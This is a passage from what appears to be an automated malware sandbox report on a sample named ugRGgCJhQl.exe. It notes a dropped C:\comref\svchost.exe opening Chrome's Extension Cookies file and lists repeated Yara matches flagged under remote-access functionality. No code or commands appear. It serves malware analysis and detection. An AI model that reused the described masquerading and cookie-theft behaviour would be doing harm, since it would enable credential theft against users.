Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: 0000000E.00000002.3783847798.0000000012AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchost.exe PID: 4340, type: MEMORYSTR
Source: Yara match File source: ugRGgCJhQl.exe, type: SAMPLE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.69ee6cb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.svchost.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000000.1292145325.0000000000232000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1235344386.00000000069A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1234987945.0000000006090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\comref\svchost.exe, type: DROPPED
Source: Yara match File source: ugRGgCJhQl.exe, type: SAMPLE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.69ee6cb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.svchost.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\comref\svchost.exe, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs